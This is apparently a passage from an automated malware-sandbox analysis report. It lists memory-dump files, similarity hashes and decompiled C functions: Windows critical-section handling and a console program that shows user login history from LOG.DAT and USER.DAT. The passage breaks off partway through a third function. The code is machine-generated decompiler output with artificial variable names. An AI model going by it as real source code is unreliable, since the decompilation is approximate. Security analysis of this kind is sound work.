Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0beec0523f2cee48ad4ddb9dc0a4ee7cbc5034f8fc842855de1175fe1129c6ab
Instruction ID: 4a5e4dcb9a2fff850b77782e5d4875981b14477edf92ff5ee905929c81c24c6e
Opcode Fuzzy Hash: 0beec0523f2cee48ad4ddb9dc0a4ee7cbc5034f8fc842855de1175fe1129c6ab
Instruction Fuzzy Hash: 28517A20A38603CAD7267B1CD5C53FA6B98DB407D0F158D69E2DD422EDEB34C4989B46

Uniqueness

Uniqueness Score: -1.00%

Function 0093EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0093EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0092DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9f793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009116C0(_t39);
				} else {
					_t40 = E0090F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00953915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9f793c; // 0x0
								_push(_t85);
								_t44 = E00911F28(_t71);
							} else {
								_t44 = E0090F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00953915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00992306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0093EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00954FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00963F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00963F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9f20c0;
								if(_t85 != 0x9f20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0099217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00963F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0093ec56
0x0093ec56
0x0093ec56
0x0093ec5c
0x0093ec64
0x009723e6
0x009723eb
0x009723eb
0x0093ec6a
0x0093ec6c
0x0093ec6f
0x009723f3
0x009723f8
0x009723fa
0x009723fc
0x0093ec75
0x0093ec76
0x0093ec76
0x0093ec7b
0x0093ec7c
0x0093ec7e
0x00972406
0x00972407
0x0097240c
0x0097240d
0x0097240d
0x0097240d
0x00972414
0x00972417
0x0097241e
0x00972435
0x00972438
0x0097243c
0x0097243f
0x00972442
0x00972443
0x00972446
0x00972449
0x00972453
0x00972455
0x0097245b
0x0097245b
0x0093eb99
0x0093eb99
0x0093eb9c
0x0093eb9d
0x0093eb9f
0x0093eba2
0x00972465
0x0097246b
0x0097246d
0x0093eba8
0x0093eba9
0x0093eba9
0x0093ebae
0x0093ebb3
0x0093ebb9
0x0093ebbb
0x00972513
0x00972514
0x00972519
0x0097251b
0x0093ec2a
0x0093ec2d
0x0093ec33
0x0093ec36
0x0093ec3a
0x0093ec3e
0x0093ec40
0x0093ec47
0x0093ec47
0x0093ec40
0x009122c6
0x0093ebc1
0x0093ebc1
0x0093ebc5
0x0093ec9a
0x0093ec9a
0x0093ebd6
0x0093ebd6
0x00000000
0x0093ebbb
0x00972477
0x0097247c
0x00972486
0x0097248b
0x00972496
0x0097249b
0x0097249d
0x009724a0
0x009724a3
0x009724aa
0x009724aa
0x009724a5
0x009724a5
0x009724a5
0x009724ac
0x009724af
0x009724b0
0x009724b3
0x009724b9
0x009724ba
0x009724bb
0x009724c6
0x009724cb
0x009724cd
0x009724d0
0x009724d1
0x009724d4
0x009724d6
0x009724d9
0x009724d9
0x009724dc
0x009724df
0x009724e1
0x009724e7
0x009724e9
0x009724ec
0x009724ef
0x009724f2
0x009724f2
0x009724ef
0x009724e7
0x009724fa
0x009724ff
0x00972501
0x00972503
0x00972506
0x0097250b
0x0093eb8c
0x0093eb93
0x00000000
0x00000000
0x0093eb93
0x00000000
0x0093eb99
0x0093ec85
0x0093ec85
0x0093ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009724BD
RTL: Re-Waiting, xrefs: 009724FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0097248D

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
Instruction ID: de123f56b8b9317c40485bac626a5db3d158d5a5df3137b3a6874b3cedfed3e7
Opcode Fuzzy Hash: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
Instruction Fuzzy Hash: 9341E771604204ABDB20DB68CC85FAA77BDEF84720F20CA05F5599B2D1D775E9418B60

Uniqueness

Uniqueness Score: -1.00%

Function 012B347B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E012B347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t218;
				void* _t228;
				void* _t249;
				void* _t270;
				void* _t283;
				void* _t287;
				void* _t306;
				intOrPtr _t307;
				void* _t309;
				intOrPtr _t310;
				void* _t313;
				void* _t314;
				intOrPtr _t320;
				void* _t336;
				intOrPtr _t364;
				void* _t371;
				intOrPtr _t394;
				void* _t397;
				void* _t421;
				void* _t433;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t450;
				void* _t451;
				void* _t457;

				L0:
				while(1) {
					L0:
					_t457 = __fp0;
					_t421 = __esi;
					_t397 = __edi;
					_t314 = __ebx;
					 *(_t433 - 8) = 1 +  *(_t433 - 8);
					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
					while(1) {
						L69:
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
						if(__eflags < 0) {
						}
						L70:
						E012B12B0(5,  *(_t433 - 0xc) + 0xa);
						_push(1 +  *(_t433 - 8));
						_push("%d.");
						E012B715C(_t314, _t397, _t421, __eflags);
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_t270 = E012B82C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
						_t448 = _t435 + 0xc;
						__eflags = _t270 - 0xa;
						if(__eflags < 0) {
							_t336 =  *(_t433 - 8) * 0x45;
							__eflags = _t336;
							_t185 = _t336 + 0x22; // 0x23
							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
							E012B16A0(_t397, _t421, _t457);
						}
						L72:
						E012B12B0(9,  *(_t433 - 0xc) + 0xa);
						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
						_push("%s\t\t%s\t%s\t\t%s");
						E012B715C(_t314, _t397, _t421, __eflags);
						_t435 = _t448 + 0x14;
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
							L74:
							goto L0;
						} else {
							L73:
							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
						}
						L75:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if( *((char*)(_t433 - 1)) == 0x53) {
							L77:
							 *(_t433 - 0x34) = 1;
						} else {
							L76:
							__eflags =  *((char*)(_t433 - 1)) - 0x73;
							if( *((char*)(_t433 - 1)) == 0x73) {
								goto L77;
							}
						}
						L78:
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if( *((char*)(_t433 - 1)) == 0x20) {
							_t322 =  *(_t433 - 8);
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
						}
						L81:
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if(__eflags == 0) {
							L50:
							E012B20E0(_t322, _t397, _t421, __eflags, _t457);
							__eflags =  *(_t433 - 0x14) - 0xc;
							if(__eflags >= 0) {
								E012B12B0(0xf, 0x15);
								_push("Press SPACE BAR to view more data");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							} else {
								E012B12B0(8, 0x15);
								_push("Press S to toggle Sorting between ascending or descending order.");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							}
							L53:
							E012B12B0(5, 8);
							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
							E012B715C(_t314, _t397, _t421, __eflags);
							_t435 = _t446 + 4;
							E012B12B0(4, 9);
							 *(_t433 - 8) = 0;
							while(1) {
								L55:
								__eflags =  *(_t433 - 8) - 0x46;
								if(__eflags >= 0) {
									break;
								}
								L56:
								_push(0xc4);
								_push("%c");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t435 = _t435 + 8;
								L54:
								_t287 = 1 +  *(_t433 - 8);
								__eflags = _t287;
								 *(_t433 - 8) = _t287;
							}
							L57:
							__eflags =  *(_t433 - 0x34);
							if( *(_t433 - 0x34) != 0) {
								L58:
								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
								while(1) {
									L60:
									__eflags =  *(_t433 - 8);
									if( *(_t433 - 8) < 0) {
										break;
									}
									L61:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L59:
									_t371 =  *(_t433 - 8) - 1;
									__eflags = _t371;
									 *(_t433 - 8) = _t371;
								}
								L62:
								 *(_t433 - 8) = 0;
								while(1) {
									L64:
									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
										goto L66;
									}
									L65:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L63:
									_t283 = 1 +  *(_t433 - 8);
									__eflags = _t283;
									 *(_t433 - 8) = _t283;
								}
							}
							L66:
							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
							L68:
							 *(_t433 - 8) =  *(_t433 - 0x1c);
							 *(_t433 - 0xc) = 0;
							L69:
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if(__eflags < 0) {
							}
							goto L75;
						}
						L82:
						_t249 =  *((char*)(_t433 - 1));
						__eflags = _t249 - 0x73;
						if(__eflags == 0) {
							goto L50;
						}
						L83:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if(__eflags == 0) {
							goto L50;
						}
						L84:
						while(1) {
							L86:
							__eflags = 1;
							if(1 == 0) {
								break;
							}
							L1:
							 *(_t433 - 8) = 0;
							 *(_t433 - 0x28) = 0;
							 *(_t433 - 0x1c) = 0;
							 *(_t433 - 0x34) = 0;
							_t218 = E012B6EF1("LOG.DAT", "r");
							_t436 = _t435 + 8;
							 *0x12d2f20 = _t218;
							while(1) {
								L2:
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
								_t320 =  *0x12d2f20; // 0x0
								_t228 = E012B7021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
								_t437 = _t436 + 0x18;
								if(_t228 == 0xffffffff) {
									break;
								}
								L3:
								_t307 = E012B6EF1("USER.DAT", "r");
								_t450 = _t437 + 8;
								 *0x12d2f28 = _t307;
								while(1) {
									L4:
									_push(_t433 - 0x78);
									_push(_t433 - 0x58);
									_t394 =  *0x12d2f28; // 0x0
									_t309 = E012B7021(_t394, "%s %s %s\n", _t433 - 0x38);
									_t451 = _t450 + 0x14;
									if(_t309 == 0xffffffff) {
										break;
									}
									L5:
									_t313 = E012B8230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
									_t450 = _t451 + 8;
									if(_t313 == 0) {
										 *(_t433 - 8) = 1 +  *(_t433 - 8);
									}
								}
								L8:
								_t310 =  *0x12d2f28; // 0x0
								_push(_t310);
								E012B6DB6(_t314, _t397, _t421, __eflags);
								_t436 = _t451 + 4;
							}
							L9:
							 *(_t433 - 0x30) =  *(_t433 - 8);
							_t364 =  *0x12d2f20; // 0x0
							_push(_t364);
							E012B6DB6(_t314, _t397, _t421, __eflags);
							E012B20E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
							E012B12B0(0x1e, 8);
							_push("1. View by USER NAME");
							E012B715C(_t314, _t397, _t421, __eflags);
							E012B12B0(0x1e, 0xa);
							_push("2. View by DATE");
							E012B715C(_t314, _t397, _t421, __eflags);
							E012B12B0(0x1e, 0xc);
							_push("3. View ALL User history");
							E012B715C(_t314, _t397, _t421, __eflags);
							E012B12B0(0x1e, 0xe);
							_push("4. Return to main menu");
							E012B715C(_t314, _t397, _t421, __eflags);
							_t442 = _t437 + 0x14;
							E012B12B0(1, 0xf);
							 *(_t433 - 8) = 0;
							while(1) {
								L11:
								__eflags =  *(_t433 - 8) - 0x4e;
								if(__eflags >= 0) {
									break;
								}
								L12:
								_push("_");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t442 = _t442 + 4;
								_t306 = 1 +  *(_t433 - 8);
								__eflags = _t306;
								 *(_t433 - 8) = _t306;
							}
							L13:
							E012B12B0(0x17, 0x11);
							_push(" Press a number between the range [1 -4]  ");
							E012B715C(_t314, _t397, _t421, __eflags);
							_t443 = _t442 + 4;
							 *(_t433 - 0xc) = 0;
							_t322 =  *(_t433 - 0xc);
							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
							E012B20E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
							__eflags =  *(_t433 - 0x20) - 3;
							if(__eflags > 0) {
								L38:
								E012B20E0(_t322, _t397, _t421, __eflags, _t457);
								E012B12B0(0xa, 0xa);
								_push("Your input is out of range! Enter a choice between 1 to 4!");
								E012B715C(_t314, _t397, _t421, __eflags);
								E012B12B0(0xf, 0xc);
								_push("Press ENTER to return to main menu...");
								_t249 = E012B715C(_t314, _t397, _t421, __eflags);
								_t435 = _t443 + 8;
								 *(_t433 - 0x28) = 1;
								goto L39;
							} else {
								L14:
								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M012B35F8))) {
									case 0:
										L15:
										E012B12B0(0x1e, 0xa);
										_push("Enter user name : ");
										E012B715C(_t314, _t397, _t421, __eflags);
										_t365 = _t433 - 0x58;
										_t249 = E012B738B(" %s", _t433 - 0x58);
										_t435 = _t443 + 0xc;
										 *(_t433 - 8) = 0;
										while(1) {
											L17:
											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
												break;
											}
											L18:
											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
											_t299 = E012B8230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
											_t435 = _t435 + 8;
											__eflags = _t299;
											if(_t299 == 0) {
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t303 = 1 +  *(_t433 - 0xc);
												__eflags = _t303;
												 *(_t433 - 0xc) = _t303;
											}
											_t249 = 1 +  *(_t433 - 8);
											__eflags = _t249;
											 *(_t433 - 8) = _t249;
										}
										L21:
										_t322 =  *(_t433 - 0xc);
										 *(_t433 - 0x14) =  *(_t433 - 0xc);
										goto L39;
									case 1:
										do {
											L22:
											__eax = E012B12B0(0x1e, 0xa);
											_push("Enter Date (dd/mm/yyyy) : ");
											__eax = E012B715C(__ebx, __edi, __esi, __eflags);
											__esp = __esp + 4;
											__edx = __ebp - 0x58;
											E012B738B(" %s", __ebp - 0x58) = __ebp - 0x58;
											__eflags = E012B1E60(__eflags, __ebp - 0x58);
											if(__eflags == 0) {
												__eax = E012B1500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
												_push(0x12cf8b0);
												__eax = E012B715C(__ebx, __edi, __esi, __eflags);
												__esp = __esp + 4;
											}
											__ecx = __ebp - 0x58;
											__eflags = E012B1E60(__eflags, __ebp - 0x58);
										} while (__eflags == 0);
										__edx = __ebp - 0x58;
										_push(__ebp - 0x58);
										__eax = E012B15D0();
										 *(__ebp - 8) = 0;
										 *(__ebp - 0xc) = 0;
										while(1) {
											L27:
											__ecx =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L28:
											__edx = __ebp - 0x58;
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__ecx =  *(__ebp - 0x18);
											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
											__eax = E012B8230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
												__ecx = 0x11;
												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
												__edi = __esi + __ecx;
												__edi = __esi + __ecx + __ecx;
												__ecx = 0;
												asm("movsb");
												__eax =  *(__ebp - 0xc);
												__eax = 1 +  *(__ebp - 0xc);
												__eflags = __eax;
												 *(__ebp - 0xc) = __eax;
											}
											__eax =  *(__ebp - 8);
											__eax = 1 +  *(__ebp - 8);
											__eflags = __eax;
											 *(__ebp - 8) = __eax;
										}
										L31:
										__ecx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) = __ecx;
										goto L39;
									case 2:
										L32:
										 *(__ebp - 8) = 0;
										while(1) {
											L34:
											__eax =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L35:
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
											__ecx = 0x11;
											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											__ecx = 0;
											asm("movsb");
											__ecx =  *(__ebp - 0xc);
											__ecx = 1 +  *(__ebp - 0xc);
											 *(__ebp - 0xc) = __ecx;
											__edx =  *(__ebp - 8);
											__edx = 1 +  *(__ebp - 8);
											__eflags = __edx;
											 *(__ebp - 8) = __edx;
										}
										L36:
										__edx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) =  *(__ebp - 0xc);
										L39:
										__eflags =  *(_t433 - 0x14);
										if(__eflags == 0) {
											E012B20E0(_t322, _t397, _t421, __eflags, _t457);
											E012B12B0(0x1b, 0xc);
											_push(0x12cf918);
											E012B715C(_t314, _t397, _t421, __eflags);
											_t435 = _t435 + 4;
											_t249 = E012B2E80(_t314, _t365, __eflags, _t457);
										}
										__eflags =  *(_t433 - 0x28);
										if( *(_t433 - 0x28) != 0) {
											L85:
											 *(_t433 - 0x28) = 0;
										} else {
											L42:
											 *(_t433 - 8) = 0;
											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
											while(1) {
												L44:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
													break;
												}
												L45:
												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t322 = 1 +  *(_t433 - 8);
												 *(_t433 - 8) = 1 +  *(_t433 - 8);
												_t391 =  *(_t433 - 0xc) - 1;
												__eflags = _t391;
												 *(_t433 - 0xc) = _t391;
											}
											L46:
											 *(_t433 - 8) = 0;
											while(1) {
												L48:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if(__eflags >= 0) {
													goto L50;
												}
												L49:
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												L47:
												_t322 = 1 +  *(_t433 - 8);
												__eflags = _t322;
												 *(_t433 - 8) = _t322;
											}
											goto L50;
										}
										goto L86;
									case 3:
										L37:
										goto L87;
								}
							}
							break;
						}
						L87:
						return _t249;
						L88:
					}
				}
			}

APIs

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B34B3
_wprintf.LIBCMT ref: 012B3560

Strings

%s%s%s%s, xrefs: 012B355B
%d., xrefs: 012B34AE

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$ConsoleCursorHandlePosition
String ID: %d.$%s%s%s%s
API String ID: 3459578117-4028964860
Opcode ID: 77a5ac3b844cfe09d167274e5dfe16135f264499b082f04a2df9ed44b6a5bd00
Instruction ID: 3b8b7a954b676ffe6bd366fad449bf3f2ee8b569495e42e32a9332115d2cc95b
Opcode Fuzzy Hash: 77a5ac3b844cfe09d167274e5dfe16135f264499b082f04a2df9ed44b6a5bd00
Instruction Fuzzy Hash: 5D417EB1E1404BAFCF1CCB88D9D0AFEBB76FF95344F558199D101AB246DA30AA45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0094FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0094FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

